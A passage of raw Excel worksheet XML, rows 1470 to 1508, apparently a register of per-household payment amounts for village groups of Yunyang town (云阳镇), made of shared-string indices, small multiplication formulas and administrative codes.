        <v>3543</v>
      </c>
      <c r="C1470" s="24" t="s">
        <v>3596</v>
      </c>
      <c r="D1470" s="24" t="s">
        <v>3958</v>
      </c>
      <c r="E1470" s="24" t="s">
        <v>3959</v>
      </c>
      <c r="F1470" s="24" t="s">
        <v>3547</v>
      </c>
      <c r="G1470" s="24">
        <v>1</v>
      </c>
      <c r="H1470" s="25">
        <v>365</v>
      </c>
      <c r="I1470" s="24">
        <f t="shared" si="22"/>
        <v>365</v>
      </c>
      <c r="J1470" s="24" t="s">
        <v>224</v>
      </c>
      <c r="K1470" s="24" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="1471" customHeight="1" spans="1:12">
      <c r="A1471" s="23" t="s">
        <v>3960</v>
      </c>
      <c r="B1471" s="24" t="s">
        <v>3543</v>
      </c>
      <c r="C1471" s="24" t="s">
        <v>3798</v>
      </c>
      <c r="D1471" s="24" t="s">
        <v>1604</v>
      </c>
      <c r="E1471" s="24" t="s">
        <v>3733</v>
      </c>
      <c r="F1471" s="24" t="s">
        <v>3547</v>
      </c>
      <c r="G1471" s="24">
        <v>1</v>
      </c>
      <c r="H1471" s="25">
        <v>365</v>
      </c>
      <c r="I1471" s="24">
        <f t="shared" si="22"/>
        <v>365</v>
      </c>
      <c r="J1471" s="24" t="s">
        <v>224</v>
      </c>
      <c r="K1471" s="24" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="1472" customHeight="1" spans="1:12">
      <c r="A1472" s="23" t="s">
        <v>3961</v>
      </c>
      <c r="B1472" s="24" t="s">
        <v>3543</v>
      </c>
      <c r="C1472" s="24" t="s">
        <v>3596</v>
      </c>
      <c r="D1472" s="24" t="s">
        <v>3962</v>
      </c>
      <c r="E1472" s="24" t="s">
        <v>3963</v>
      </c>
      <c r="F1472" s="24" t="s">
        <v>3547</v>
      </c>
      <c r="G1472" s="24">
        <v>1</v>
      </c>
      <c r="H1472" s="25">
        <v>365</v>
      </c>
      <c r="I1472" s="24">
        <f t="shared" si="22"/>
        <v>365</v>
      </c>
      <c r="J1472" s="24" t="s">
        <v>224</v>
      </c>
      <c r="K1472" s="24" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="1473" customHeight="1" spans="1:11">
      <c r="A1473" s="23" t="s">
        <v>3964</v>
      </c>
      <c r="B1473" s="24" t="s">
        <v>3543</v>
      </c>
      <c r="C1473" s="24" t="s">
        <v>3589</v>
      </c>
      <c r="D1473" s="24" t="s">
        <v>3965</v>
      </c>
      <c r="E1473" s="24" t="s">
        <v>3966</v>
      </c>
      <c r="F1473" s="24" t="s">
        <v>3581</v>
      </c>
      <c r="G1473" s="24">
        <v>1</v>
      </c>
      <c r="H1473" s="25">
        <v>365</v>
      </c>
      <c r="I1473" s="24">
        <f t="shared" si="22"/>
        <v>365</v>
      </c>
      <c r="J1473" s="24" t="s">
        <v>224</v>
      </c>
      <c r="K1473" s="24" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="1474" customHeight="1" spans="1:11">
      <c r="A1474" s="23" t="s">
        <v>3967</v>
      </c>
      <c r="B1474" s="24" t="s">
        <v>3543</v>
      </c>
      <c r="C1474" s="24" t="s">
        <v>3968</v>
      </c>
      <c r="D1474" s="24" t="s">
        <v>3969</v>
      </c>
      <c r="E1474" s="24" t="s">
        <v>3637</v>
      </c>
      <c r="F1474" s="24" t="s">
        <v>3567</v>
      </c>
      <c r="G1474" s="24">
        <v>1</v>
      </c>
      <c r="H1474" s="25">
        <v>365</v>
      </c>
      <c r="I1474" s="24">
        <f t="shared" si="22"/>
        <v>365</v>
      </c>
      <c r="J1474" s="24" t="s">
        <v>224</v>
      </c>
      <c r="K1474" s="24" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="1475" customHeight="1" spans="1:11">
      <c r="A1475" s="23" t="s">
        <v>3970</v>
      </c>
      <c r="B1475" s="24" t="s">
        <v>3543</v>
      </c>
      <c r="C1475" s="24" t="s">
        <v>3555</v>
      </c>
      <c r="D1475" s="24" t="s">
        <v>3971</v>
      </c>
      <c r="E1475" s="24" t="s">
        <v>3972</v>
      </c>
      <c r="F1475" s="24" t="s">
        <v>3547</v>
      </c>
      <c r="G1475" s="24">
        <v>2</v>
      </c>
      <c r="H1475" s="25">
        <v>325</v>
      </c>
      <c r="I1475" s="24">
        <f t="shared" si="22"/>
        <v>650</v>
      </c>
      <c r="J1475" s="24" t="s">
        <v>224</v>
      </c>
      <c r="K1475" s="24" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="1476" customHeight="1" spans="1:11">
      <c r="A1476" s="23" t="s">
        <v>3973</v>
      </c>
      <c r="B1476" s="24" t="str">
        <f>B1475</f>
        <v>云阳镇</v>
      </c>
      <c r="C1476" s="24" t="str">
        <f>C1475</f>
        <v>小关四组</v>
      </c>
      <c r="D1476" s="30" t="s">
        <v>3974</v>
      </c>
      <c r="E1476" s="36" t="s">
        <v>3975</v>
      </c>
      <c r="F1476" s="24" t="str">
        <f>F1475</f>
        <v>4113210521</v>
      </c>
      <c r="G1476" s="24"/>
      <c r="H1476" s="24"/>
      <c r="I1476" s="24">
        <f t="shared" ref="I1476:I1539" si="23">H1476*G1476</f>
        <v>0</v>
      </c>
      <c r="J1476" s="24"/>
      <c r="K1476" s="24" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="1477" customHeight="1" spans="1:11">
      <c r="A1477" s="23" t="s">
        <v>3976</v>
      </c>
      <c r="B1477" s="24" t="s">
        <v>3543</v>
      </c>
      <c r="C1477" s="24" t="s">
        <v>3977</v>
      </c>
      <c r="D1477" s="24" t="s">
        <v>3978</v>
      </c>
      <c r="E1477" s="24" t="s">
        <v>3631</v>
      </c>
      <c r="F1477" s="24" t="s">
        <v>3547</v>
      </c>
      <c r="G1477" s="24">
        <v>1</v>
      </c>
      <c r="H1477" s="25">
        <v>365</v>
      </c>
      <c r="I1477" s="24">
        <f t="shared" si="23"/>
        <v>365</v>
      </c>
      <c r="J1477" s="24" t="s">
        <v>224</v>
      </c>
      <c r="K1477" s="24" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="1478" customHeight="1" spans="1:11">
      <c r="A1478" s="23" t="s">
        <v>3979</v>
      </c>
      <c r="B1478" s="24" t="s">
        <v>3543</v>
      </c>
      <c r="C1478" s="24" t="s">
        <v>3980</v>
      </c>
      <c r="D1478" s="24" t="s">
        <v>3981</v>
      </c>
      <c r="E1478" s="24" t="s">
        <v>3982</v>
      </c>
      <c r="F1478" s="24" t="s">
        <v>3567</v>
      </c>
      <c r="G1478" s="24">
        <v>1</v>
      </c>
      <c r="H1478" s="25">
        <v>365</v>
      </c>
      <c r="I1478" s="24">
        <f t="shared" si="23"/>
        <v>365</v>
      </c>
      <c r="J1478" s="24" t="s">
        <v>224</v>
      </c>
      <c r="K1478" s="24" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="1479" customHeight="1" spans="1:11">
      <c r="A1479" s="23" t="s">
        <v>3983</v>
      </c>
      <c r="B1479" s="24" t="s">
        <v>3543</v>
      </c>
      <c r="C1479" s="24" t="s">
        <v>3984</v>
      </c>
      <c r="D1479" s="24" t="s">
        <v>3985</v>
      </c>
      <c r="E1479" s="24" t="s">
        <v>3001</v>
      </c>
      <c r="F1479" s="24" t="s">
        <v>3567</v>
      </c>
      <c r="G1479" s="24">
        <v>1</v>
      </c>
      <c r="H1479" s="25">
        <v>365</v>
      </c>
      <c r="I1479" s="24">
        <f t="shared" si="23"/>
        <v>365</v>
      </c>
      <c r="J1479" s="24" t="s">
        <v>224</v>
      </c>
      <c r="K1479" s="24" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="1480" customHeight="1" spans="1:11">
      <c r="A1480" s="23" t="s">
        <v>3986</v>
      </c>
      <c r="B1480" s="24" t="s">
        <v>3543</v>
      </c>
      <c r="C1480" s="24" t="s">
        <v>3984</v>
      </c>
      <c r="D1480" s="24" t="s">
        <v>3987</v>
      </c>
      <c r="E1480" s="24" t="s">
        <v>1312</v>
      </c>
      <c r="F1480" s="24" t="s">
        <v>3567</v>
      </c>
      <c r="G1480" s="24">
        <v>1</v>
      </c>
      <c r="H1480" s="25">
        <v>365</v>
      </c>
      <c r="I1480" s="24">
        <f t="shared" si="23"/>
        <v>365</v>
      </c>
      <c r="J1480" s="24" t="s">
        <v>224</v>
      </c>
      <c r="K1480" s="24" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="1481" customHeight="1" spans="1:11">
      <c r="A1481" s="23" t="s">
        <v>3988</v>
      </c>
      <c r="B1481" s="24" t="s">
        <v>3543</v>
      </c>
      <c r="C1481" s="24" t="s">
        <v>3989</v>
      </c>
      <c r="D1481" s="24" t="s">
        <v>3990</v>
      </c>
      <c r="E1481" s="24" t="s">
        <v>3813</v>
      </c>
      <c r="F1481" s="24" t="s">
        <v>3576</v>
      </c>
      <c r="G1481" s="24">
        <v>1</v>
      </c>
      <c r="H1481" s="25">
        <v>365</v>
      </c>
      <c r="I1481" s="24">
        <f t="shared" si="23"/>
        <v>365</v>
      </c>
      <c r="J1481" s="24" t="s">
        <v>224</v>
      </c>
      <c r="K1481" s="24" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="1482" customHeight="1" spans="1:11">
      <c r="A1482" s="23" t="s">
        <v>3991</v>
      </c>
      <c r="B1482" s="24" t="s">
        <v>3543</v>
      </c>
      <c r="C1482" s="24" t="s">
        <v>3977</v>
      </c>
      <c r="D1482" s="24" t="s">
        <v>3992</v>
      </c>
      <c r="E1482" s="24" t="s">
        <v>3886</v>
      </c>
      <c r="F1482" s="24" t="s">
        <v>3547</v>
      </c>
      <c r="G1482" s="24">
        <v>3</v>
      </c>
      <c r="H1482" s="25">
        <v>355</v>
      </c>
      <c r="I1482" s="24">
        <f t="shared" si="23"/>
        <v>1065</v>
      </c>
      <c r="J1482" s="24" t="s">
        <v>224</v>
      </c>
      <c r="K1482" s="24" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="1483" customHeight="1" spans="1:11">
      <c r="A1483" s="23" t="s">
        <v>3993</v>
      </c>
      <c r="B1483" s="24" t="str">
        <f>B1482</f>
        <v>云阳镇</v>
      </c>
      <c r="C1483" s="24" t="str">
        <f>C1482</f>
        <v>云阳小关</v>
      </c>
      <c r="D1483" s="23" t="s">
        <v>3994</v>
      </c>
      <c r="E1483" s="23" t="s">
        <v>3995</v>
      </c>
      <c r="F1483" s="24" t="str">
        <f>F1482</f>
        <v>4113210521</v>
      </c>
      <c r="G1483" s="24"/>
      <c r="H1483" s="24"/>
      <c r="I1483" s="24">
        <f t="shared" si="23"/>
        <v>0</v>
      </c>
      <c r="J1483" s="24"/>
      <c r="K1483" s="24" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="1484" customHeight="1" spans="1:11">
      <c r="A1484" s="23" t="s">
        <v>3996</v>
      </c>
      <c r="B1484" s="24" t="str">
        <f>B1483</f>
        <v>云阳镇</v>
      </c>
      <c r="C1484" s="24" t="str">
        <f>C1483</f>
        <v>云阳小关</v>
      </c>
      <c r="D1484" s="53" t="s">
        <v>3997</v>
      </c>
      <c r="E1484" s="53" t="s">
        <v>3998</v>
      </c>
      <c r="F1484" s="24" t="str">
        <f>F1483</f>
        <v>4113210521</v>
      </c>
      <c r="G1484" s="24"/>
      <c r="H1484" s="24"/>
      <c r="I1484" s="24">
        <f t="shared" si="23"/>
        <v>0</v>
      </c>
      <c r="J1484" s="24"/>
      <c r="K1484" s="24" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="1485" customHeight="1" spans="1:11">
      <c r="A1485" s="23" t="s">
        <v>3999</v>
      </c>
      <c r="B1485" s="24" t="s">
        <v>3543</v>
      </c>
      <c r="C1485" s="24" t="s">
        <v>4000</v>
      </c>
      <c r="D1485" s="24" t="s">
        <v>4001</v>
      </c>
      <c r="E1485" s="24" t="s">
        <v>3587</v>
      </c>
      <c r="F1485" s="24" t="s">
        <v>3576</v>
      </c>
      <c r="G1485" s="24">
        <v>1</v>
      </c>
      <c r="H1485" s="25">
        <v>365</v>
      </c>
      <c r="I1485" s="24">
        <f t="shared" si="23"/>
        <v>365</v>
      </c>
      <c r="J1485" s="24" t="s">
        <v>224</v>
      </c>
      <c r="K1485" s="24" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="1486" customHeight="1" spans="1:11">
      <c r="A1486" s="23" t="s">
        <v>4002</v>
      </c>
      <c r="B1486" s="24" t="s">
        <v>3543</v>
      </c>
      <c r="C1486" s="24" t="s">
        <v>3721</v>
      </c>
      <c r="D1486" s="24" t="s">
        <v>4003</v>
      </c>
      <c r="E1486" s="24" t="s">
        <v>4004</v>
      </c>
      <c r="F1486" s="24" t="s">
        <v>3581</v>
      </c>
      <c r="G1486" s="24">
        <v>2</v>
      </c>
      <c r="H1486" s="25">
        <v>335</v>
      </c>
      <c r="I1486" s="24">
        <f t="shared" si="23"/>
        <v>670</v>
      </c>
      <c r="J1486" s="24" t="s">
        <v>224</v>
      </c>
      <c r="K1486" s="24" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="1487" customHeight="1" spans="1:11">
      <c r="A1487" s="23" t="s">
        <v>4005</v>
      </c>
      <c r="B1487" s="24" t="str">
        <f>B1486</f>
        <v>云阳镇</v>
      </c>
      <c r="C1487" s="24" t="str">
        <f>C1486</f>
        <v>老城二组</v>
      </c>
      <c r="D1487" s="31" t="s">
        <v>4006</v>
      </c>
      <c r="E1487" s="31" t="s">
        <v>1632</v>
      </c>
      <c r="F1487" s="24" t="str">
        <f>F1486</f>
        <v>4113210523</v>
      </c>
      <c r="G1487" s="24"/>
      <c r="H1487" s="24"/>
      <c r="I1487" s="24">
        <f t="shared" si="23"/>
        <v>0</v>
      </c>
      <c r="J1487" s="24"/>
      <c r="K1487" s="24" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="1488" customHeight="1" spans="1:11">
      <c r="A1488" s="23" t="s">
        <v>4007</v>
      </c>
      <c r="B1488" s="24" t="s">
        <v>3543</v>
      </c>
      <c r="C1488" s="24" t="s">
        <v>3798</v>
      </c>
      <c r="D1488" s="24" t="s">
        <v>4008</v>
      </c>
      <c r="E1488" s="24" t="s">
        <v>3813</v>
      </c>
      <c r="F1488" s="24" t="s">
        <v>3547</v>
      </c>
      <c r="G1488" s="24">
        <v>1</v>
      </c>
      <c r="H1488" s="25">
        <v>365</v>
      </c>
      <c r="I1488" s="24">
        <f t="shared" si="23"/>
        <v>365</v>
      </c>
      <c r="J1488" s="24" t="s">
        <v>224</v>
      </c>
      <c r="K1488" s="24" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="1489" customHeight="1" spans="1:11">
      <c r="A1489" s="23" t="s">
        <v>4009</v>
      </c>
      <c r="B1489" s="24" t="s">
        <v>3543</v>
      </c>
      <c r="C1489" s="24" t="s">
        <v>3811</v>
      </c>
      <c r="D1489" s="24" t="s">
        <v>4010</v>
      </c>
      <c r="E1489" s="24" t="s">
        <v>4011</v>
      </c>
      <c r="F1489" s="24" t="s">
        <v>3576</v>
      </c>
      <c r="G1489" s="24">
        <v>1</v>
      </c>
      <c r="H1489" s="25">
        <v>365</v>
      </c>
      <c r="I1489" s="24">
        <f t="shared" si="23"/>
        <v>365</v>
      </c>
      <c r="J1489" s="24" t="s">
        <v>224</v>
      </c>
      <c r="K1489" s="24" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="1490" customHeight="1" spans="1:11">
      <c r="A1490" s="23" t="s">
        <v>4012</v>
      </c>
      <c r="B1490" s="24" t="s">
        <v>3543</v>
      </c>
      <c r="C1490" s="24" t="s">
        <v>3543</v>
      </c>
      <c r="D1490" s="24" t="s">
        <v>4013</v>
      </c>
      <c r="E1490" s="24" t="s">
        <v>3673</v>
      </c>
      <c r="F1490" s="24" t="s">
        <v>3576</v>
      </c>
      <c r="G1490" s="24">
        <v>1</v>
      </c>
      <c r="H1490" s="25">
        <v>365</v>
      </c>
      <c r="I1490" s="24">
        <f t="shared" si="23"/>
        <v>365</v>
      </c>
      <c r="J1490" s="24" t="s">
        <v>224</v>
      </c>
      <c r="K1490" s="24" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="1491" customHeight="1" spans="1:11">
      <c r="A1491" s="23" t="s">
        <v>4014</v>
      </c>
      <c r="B1491" s="24" t="s">
        <v>3543</v>
      </c>
      <c r="C1491" s="24" t="s">
        <v>3811</v>
      </c>
      <c r="D1491" s="24" t="s">
        <v>4015</v>
      </c>
      <c r="E1491" s="24" t="s">
        <v>3584</v>
      </c>
      <c r="F1491" s="24" t="s">
        <v>3576</v>
      </c>
      <c r="G1491" s="24">
        <v>1</v>
      </c>
      <c r="H1491" s="25">
        <v>365</v>
      </c>
      <c r="I1491" s="24">
        <f t="shared" si="23"/>
        <v>365</v>
      </c>
      <c r="J1491" s="24" t="s">
        <v>224</v>
      </c>
      <c r="K1491" s="24" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="1492" customHeight="1" spans="1:11">
      <c r="A1492" s="23" t="s">
        <v>4016</v>
      </c>
      <c r="B1492" s="24" t="s">
        <v>3543</v>
      </c>
      <c r="C1492" s="24" t="s">
        <v>3544</v>
      </c>
      <c r="D1492" s="24" t="s">
        <v>4017</v>
      </c>
      <c r="E1492" s="24" t="s">
        <v>4018</v>
      </c>
      <c r="F1492" s="24" t="s">
        <v>3547</v>
      </c>
      <c r="G1492" s="24">
        <v>2</v>
      </c>
      <c r="H1492" s="25">
        <v>325</v>
      </c>
      <c r="I1492" s="24">
        <f t="shared" si="23"/>
        <v>650</v>
      </c>
      <c r="J1492" s="24" t="s">
        <v>224</v>
      </c>
      <c r="K1492" s="24" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="1493" customHeight="1" spans="1:11">
      <c r="A1493" s="23" t="s">
        <v>4019</v>
      </c>
      <c r="B1493" s="24" t="str">
        <f>B1492</f>
        <v>云阳镇</v>
      </c>
      <c r="C1493" s="24" t="str">
        <f>C1492</f>
        <v>小关九组</v>
      </c>
      <c r="D1493" s="31" t="s">
        <v>4020</v>
      </c>
      <c r="E1493" s="31" t="s">
        <v>4021</v>
      </c>
      <c r="F1493" s="24" t="str">
        <f>F1492</f>
        <v>4113210521</v>
      </c>
      <c r="G1493" s="24"/>
      <c r="H1493" s="24"/>
      <c r="I1493" s="24">
        <f t="shared" si="23"/>
        <v>0</v>
      </c>
      <c r="J1493" s="24"/>
      <c r="K1493" s="24" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="1494" customHeight="1" spans="1:11">
      <c r="A1494" s="23" t="s">
        <v>4022</v>
      </c>
      <c r="B1494" s="24" t="s">
        <v>3543</v>
      </c>
      <c r="C1494" s="24" t="s">
        <v>3798</v>
      </c>
      <c r="D1494" s="24" t="s">
        <v>4023</v>
      </c>
      <c r="E1494" s="24" t="s">
        <v>4024</v>
      </c>
      <c r="F1494" s="24" t="s">
        <v>3547</v>
      </c>
      <c r="G1494" s="24">
        <v>1</v>
      </c>
      <c r="H1494" s="25">
        <v>365</v>
      </c>
      <c r="I1494" s="24">
        <f t="shared" si="23"/>
        <v>365</v>
      </c>
      <c r="J1494" s="24" t="s">
        <v>224</v>
      </c>
      <c r="K1494" s="24" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="1495" customHeight="1" spans="1:11">
      <c r="A1495" s="23" t="s">
        <v>4025</v>
      </c>
      <c r="B1495" s="24" t="s">
        <v>3543</v>
      </c>
      <c r="C1495" s="24" t="s">
        <v>3564</v>
      </c>
      <c r="D1495" s="24" t="s">
        <v>4026</v>
      </c>
      <c r="E1495" s="24" t="s">
        <v>4027</v>
      </c>
      <c r="F1495" s="24" t="s">
        <v>3567</v>
      </c>
      <c r="G1495" s="24">
        <v>1</v>
      </c>
      <c r="H1495" s="25">
        <v>365</v>
      </c>
      <c r="I1495" s="24">
        <f t="shared" si="23"/>
        <v>365</v>
      </c>
      <c r="J1495" s="24" t="s">
        <v>224</v>
      </c>
      <c r="K1495" s="24" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="1496" customHeight="1" spans="1:11">
      <c r="A1496" s="23" t="s">
        <v>4028</v>
      </c>
      <c r="B1496" s="24" t="s">
        <v>3543</v>
      </c>
      <c r="C1496" s="24" t="s">
        <v>3564</v>
      </c>
      <c r="D1496" s="24" t="s">
        <v>4029</v>
      </c>
      <c r="E1496" s="24" t="s">
        <v>3832</v>
      </c>
      <c r="F1496" s="24" t="s">
        <v>3567</v>
      </c>
      <c r="G1496" s="24">
        <v>1</v>
      </c>
      <c r="H1496" s="25">
        <v>365</v>
      </c>
      <c r="I1496" s="24">
        <f t="shared" si="23"/>
        <v>365</v>
      </c>
      <c r="J1496" s="24" t="s">
        <v>224</v>
      </c>
      <c r="K1496" s="24" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="1497" customHeight="1" spans="1:11">
      <c r="A1497" s="23" t="s">
        <v>4030</v>
      </c>
      <c r="B1497" s="24" t="s">
        <v>3543</v>
      </c>
      <c r="C1497" s="24" t="s">
        <v>3564</v>
      </c>
      <c r="D1497" s="24" t="s">
        <v>4031</v>
      </c>
      <c r="E1497" s="24" t="s">
        <v>4032</v>
      </c>
      <c r="F1497" s="24" t="s">
        <v>3567</v>
      </c>
      <c r="G1497" s="24">
        <v>1</v>
      </c>
      <c r="H1497" s="25">
        <v>365</v>
      </c>
      <c r="I1497" s="24">
        <f t="shared" si="23"/>
        <v>365</v>
      </c>
      <c r="J1497" s="24" t="s">
        <v>224</v>
      </c>
      <c r="K1497" s="24" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="1498" customHeight="1" spans="1:11">
      <c r="A1498" s="23" t="s">
        <v>4033</v>
      </c>
      <c r="B1498" s="24" t="s">
        <v>3543</v>
      </c>
      <c r="C1498" s="24" t="s">
        <v>3592</v>
      </c>
      <c r="D1498" s="24" t="s">
        <v>4034</v>
      </c>
      <c r="E1498" s="24" t="s">
        <v>3959</v>
      </c>
      <c r="F1498" s="24" t="s">
        <v>3581</v>
      </c>
      <c r="G1498" s="24">
        <v>1</v>
      </c>
      <c r="H1498" s="25">
        <v>365</v>
      </c>
      <c r="I1498" s="24">
        <f t="shared" si="23"/>
        <v>365</v>
      </c>
      <c r="J1498" s="24" t="s">
        <v>224</v>
      </c>
      <c r="K1498" s="24" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="1499" customHeight="1" spans="1:11">
      <c r="A1499" s="23" t="s">
        <v>4035</v>
      </c>
      <c r="B1499" s="24" t="s">
        <v>3543</v>
      </c>
      <c r="C1499" s="24" t="s">
        <v>3578</v>
      </c>
      <c r="D1499" s="24" t="s">
        <v>4036</v>
      </c>
      <c r="E1499" s="24" t="s">
        <v>3922</v>
      </c>
      <c r="F1499" s="24" t="s">
        <v>3581</v>
      </c>
      <c r="G1499" s="24">
        <v>1</v>
      </c>
      <c r="H1499" s="25">
        <v>365</v>
      </c>
      <c r="I1499" s="24">
        <f t="shared" si="23"/>
        <v>365</v>
      </c>
      <c r="J1499" s="24" t="s">
        <v>224</v>
      </c>
      <c r="K1499" s="24" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="1500" customHeight="1" spans="1:11">
      <c r="A1500" s="23" t="s">
        <v>4037</v>
      </c>
      <c r="B1500" s="24" t="s">
        <v>3543</v>
      </c>
      <c r="C1500" s="24" t="s">
        <v>3578</v>
      </c>
      <c r="D1500" s="24" t="s">
        <v>4038</v>
      </c>
      <c r="E1500" s="24" t="s">
        <v>3695</v>
      </c>
      <c r="F1500" s="24" t="s">
        <v>3581</v>
      </c>
      <c r="G1500" s="24">
        <v>2</v>
      </c>
      <c r="H1500" s="25">
        <v>325</v>
      </c>
      <c r="I1500" s="24">
        <f t="shared" si="23"/>
        <v>650</v>
      </c>
      <c r="J1500" s="24" t="s">
        <v>224</v>
      </c>
      <c r="K1500" s="24" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="1501" customHeight="1" spans="1:11">
      <c r="A1501" s="23" t="s">
        <v>4039</v>
      </c>
      <c r="B1501" s="24" t="str">
        <f>B1500</f>
        <v>云阳镇</v>
      </c>
      <c r="C1501" s="24" t="str">
        <f>C1500</f>
        <v>老城四组</v>
      </c>
      <c r="D1501" s="23" t="s">
        <v>4040</v>
      </c>
      <c r="E1501" s="23" t="s">
        <v>3707</v>
      </c>
      <c r="F1501" s="24" t="str">
        <f>F1500</f>
        <v>4113210523</v>
      </c>
      <c r="G1501" s="24"/>
      <c r="H1501" s="24"/>
      <c r="I1501" s="24">
        <f t="shared" si="23"/>
        <v>0</v>
      </c>
      <c r="J1501" s="24"/>
      <c r="K1501" s="24" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="1502" customHeight="1" spans="1:11">
      <c r="A1502" s="23" t="s">
        <v>4041</v>
      </c>
      <c r="B1502" s="24" t="s">
        <v>3543</v>
      </c>
      <c r="C1502" s="24" t="s">
        <v>3721</v>
      </c>
      <c r="D1502" s="24" t="s">
        <v>4042</v>
      </c>
      <c r="E1502" s="24" t="s">
        <v>4032</v>
      </c>
      <c r="F1502" s="24" t="s">
        <v>3581</v>
      </c>
      <c r="G1502" s="24">
        <v>2</v>
      </c>
      <c r="H1502" s="25">
        <v>325</v>
      </c>
      <c r="I1502" s="24">
        <f t="shared" si="23"/>
        <v>650</v>
      </c>
      <c r="J1502" s="24" t="s">
        <v>224</v>
      </c>
      <c r="K1502" s="24" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="1503" customHeight="1" spans="1:11">
      <c r="A1503" s="23" t="s">
        <v>4043</v>
      </c>
      <c r="B1503" s="24" t="str">
        <f>B1502</f>
        <v>云阳镇</v>
      </c>
      <c r="C1503" s="24" t="str">
        <f>C1502</f>
        <v>老城二组</v>
      </c>
      <c r="D1503" s="23" t="s">
        <v>4044</v>
      </c>
      <c r="E1503" s="23" t="s">
        <v>4045</v>
      </c>
      <c r="F1503" s="24" t="str">
        <f>F1502</f>
        <v>4113210523</v>
      </c>
      <c r="G1503" s="24"/>
      <c r="H1503" s="24"/>
      <c r="I1503" s="24">
        <f t="shared" si="23"/>
        <v>0</v>
      </c>
      <c r="J1503" s="24"/>
      <c r="K1503" s="24" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="1504" customHeight="1" spans="1:11">
      <c r="A1504" s="23" t="s">
        <v>4046</v>
      </c>
      <c r="B1504" s="24" t="s">
        <v>3543</v>
      </c>
      <c r="C1504" s="24" t="s">
        <v>3573</v>
      </c>
      <c r="D1504" s="24" t="s">
        <v>4047</v>
      </c>
      <c r="E1504" s="24" t="s">
        <v>4048</v>
      </c>
      <c r="F1504" s="24" t="s">
        <v>3576</v>
      </c>
      <c r="G1504" s="24">
        <v>1</v>
      </c>
      <c r="H1504" s="25">
        <v>365</v>
      </c>
      <c r="I1504" s="24">
        <f t="shared" si="23"/>
        <v>365</v>
      </c>
      <c r="J1504" s="24" t="s">
        <v>224</v>
      </c>
      <c r="K1504" s="24" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="1505" customHeight="1" spans="1:11">
      <c r="A1505" s="23" t="s">
        <v>4049</v>
      </c>
      <c r="B1505" s="24" t="s">
        <v>3543</v>
      </c>
      <c r="C1505" s="24" t="s">
        <v>3639</v>
      </c>
      <c r="D1505" s="24" t="s">
        <v>4050</v>
      </c>
      <c r="E1505" s="24" t="s">
        <v>3566</v>
      </c>
      <c r="F1505" s="24" t="s">
        <v>3576</v>
      </c>
      <c r="G1505" s="24">
        <v>1</v>
      </c>
      <c r="H1505" s="25">
        <v>365</v>
      </c>
      <c r="I1505" s="24">
        <f t="shared" si="23"/>
        <v>365</v>
      </c>
      <c r="J1505" s="24" t="s">
        <v>224</v>
      </c>
      <c r="K1505" s="24" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="1506" customHeight="1" spans="1:11">
      <c r="A1506" s="23" t="s">
        <v>4051</v>
      </c>
      <c r="B1506" s="24" t="s">
        <v>3543</v>
      </c>
      <c r="C1506" s="24" t="s">
        <v>3639</v>
      </c>
      <c r="D1506" s="24" t="s">
        <v>4052</v>
      </c>
      <c r="E1506" s="24" t="s">
        <v>3620</v>
      </c>
      <c r="F1506" s="24" t="s">
        <v>3576</v>
      </c>
      <c r="G1506" s="24">
        <v>1</v>
      </c>
      <c r="H1506" s="25">
        <v>365</v>
      </c>
      <c r="I1506" s="24">
        <f t="shared" si="23"/>
        <v>365</v>
      </c>
      <c r="J1506" s="24" t="s">
        <v>224</v>
      </c>
      <c r="K1506" s="24" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="1507" customHeight="1" spans="1:11">
      <c r="A1507" s="23" t="s">
        <v>4053</v>
      </c>
      <c r="B1507" s="24" t="s">
        <v>3543</v>
      </c>
      <c r="C1507" s="24" t="s">
        <v>3596</v>
      </c>
      <c r="D1507" s="24" t="s">
        <v>4054</v>
      </c>
      <c r="E1507" s="24" t="s">
        <v>3695</v>
      </c>
      <c r="F1507" s="24" t="s">
        <v>3547</v>
      </c>
      <c r="G1507" s="24">
        <v>1</v>
      </c>
      <c r="H1507" s="25">
        <v>365</v>
      </c>
      <c r="I1507" s="24">
        <f t="shared" si="23"/>
        <v>365</v>
      </c>
      <c r="J1507" s="24" t="s">
        <v>224</v>
      </c>
      <c r="K1507" s="24" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="1508" customHeight="1" spans="1:11">
      <c r="A1508" s="23" t="s">
        <v>4055</v>
      </c>
      <c r="B1508" s="24" t="s">
        <v>3543</v>
      </c>
      <c r="C1508" s="24" t="s">
        <v>3544</v>
      </c>
      <c r="D1508" s="24" t="s">
        <v>4056</v>
      </c>
      <c r="E1508" s="24" t="s">
        <v>4057</v>
      </c>
      <c r="F1508" s="24" t="s">
        <v>3547</v>
      </c>
      <c r="G1508" s="24">
        <v>2</v>
      </c>
      <c r="H1508" s="25">
